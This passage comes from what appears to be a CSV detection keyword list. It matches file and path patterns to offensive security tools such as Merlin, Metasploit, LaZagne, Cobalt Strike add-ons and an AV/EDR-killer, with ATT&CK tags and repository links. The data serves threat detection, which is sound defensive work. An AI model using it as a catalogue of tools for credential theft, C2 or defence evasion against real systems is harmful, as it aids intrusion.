*.elf*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*memory*mimipy.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*memory/onepassword.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*memorydump.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*memorydump.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*memreader *access_token*","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/MemReader_BoF","1","0","N/A","10","10","26","3","2022-05-12T18:46:02Z","2021-04-21T20:51:25Z" +"*MemReader_BoF.*","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/MemReader_BoF","1","1","N/A","10","10","26","3","2022-05-12T18:46:02Z","2021-04-21T20:51:25Z" +"*merlin-*.zip*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"*Merlin_v0.1Beta.zip*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" +"*merlinAgent-*.7z*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4619","762","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" +"*merlinAgent-*.exe*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4619","762","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" +"*merlinAgent.exe*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" +"*merlinAgent-Darwin-*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4619","762","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" +"*merlinAgent-Linux-*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4619","762","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" +"*merlinAgent-Windows-x64.exe*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" +"*MerlinCheatSheet.pdf*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" +"*merlinServer-*.7z*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4619","762","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" +"*merlinServer-*.exe*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4619","762","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" +"*merlinserver.go*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" +"*merlinserver_windows_x64.exe*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" +"*merlinServer-Linux*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4619","762","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" +"*merlinServerLog.txt*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" +"*mertdas/RedPersist*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","1","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*mertdas/SharpLDAP*","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","1","N/A","8","1","50","7","2023-01-14T21:52:36Z","2022-11-16T00:38:43Z" +"*mertdas/SharpTerminator*","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","3","266","53","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" +"*MessageBox.Show*Pwned*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*messagebox_reflective.dll*","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z" +"*met_inject.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*metagoofil*","offensive_tool_keyword","metagoofil","Metagoofil is a tool for extracting metadata of public documents (pdf.doc.xls.ppt..etc) availables in the target websites.This information could be useful because you can get valid usernames. people names. for using later in bruteforce password attacks (vpn. ftp. webapps). the tool will also extracts interesting paths of the documents. where we can get shared resources names. server names... etc.","T1213 - T1596 - T1083 - T1082","TA0007 - TA0009 - TA0004","N/A","N/A","Information Gathering","https://github.com/laramies/metagoofi","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*metame -i *.exe*","offensive_tool_keyword","metame","metame is a metamorphic code engine for arbitrary executables","T1027 - T1059.003 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/a0rtega/metame","1","0","N/A","N/A","6","508","96","2019-10-06T18:24:14Z","2016-08-07T13:56:57Z" +"*Metasploit*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*metasploit.go*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*metasploit.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*metasploit/framework*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*metasploit/peass.rb*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*metasploit_framework.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*metasploit-framework*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*metasploit-framework*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://www.metasploit.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*metasploitframework*.msi*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*MetasploitPayload.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1149","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*metatwin.ps1*","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","1","N/A","9","4","303","72","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" +"*metatwin-master*","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","1","N/A","9","4","303","72","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" +"*meterpreter*.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*meterpreter.*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" +"*Meterpreter.ps1*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*meterpreter.sl*","offensive_tool_keyword","armitage","Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. recommends exploits and exposes the advanced capabilities of the framework ","T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002","TA0002 - TA0008 - TA0005 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t0v3rr1d3/armitage","1","1","N/A","N/A","1","81","15","2022-12-06T00:17:23Z","2022-01-23T17:32:01Z" +"*meterpreter_*.rb","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*meterpreter_loader*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*METERPRETER_STAGER*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*MeteTool*","offensive_tool_keyword","MeteTool","Metatool Minetest mod provides API for registering metadata manipulation tools and other tools primarily focused on special node data operations.","T1059.003 - T1064 - T1135 - T1059.007","TA0002 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/S-S-X/metatool","1","0","N/A","N/A","1","2","1","2023-06-10T06:24:14Z","2020-05-09T19:09:17Z" +"*methodHash*528465795*","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","0","N/A","N/A","2","178","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" +"*methods::dns::dns_exfiltrator*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*methods::https::https_exfiltrator*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data 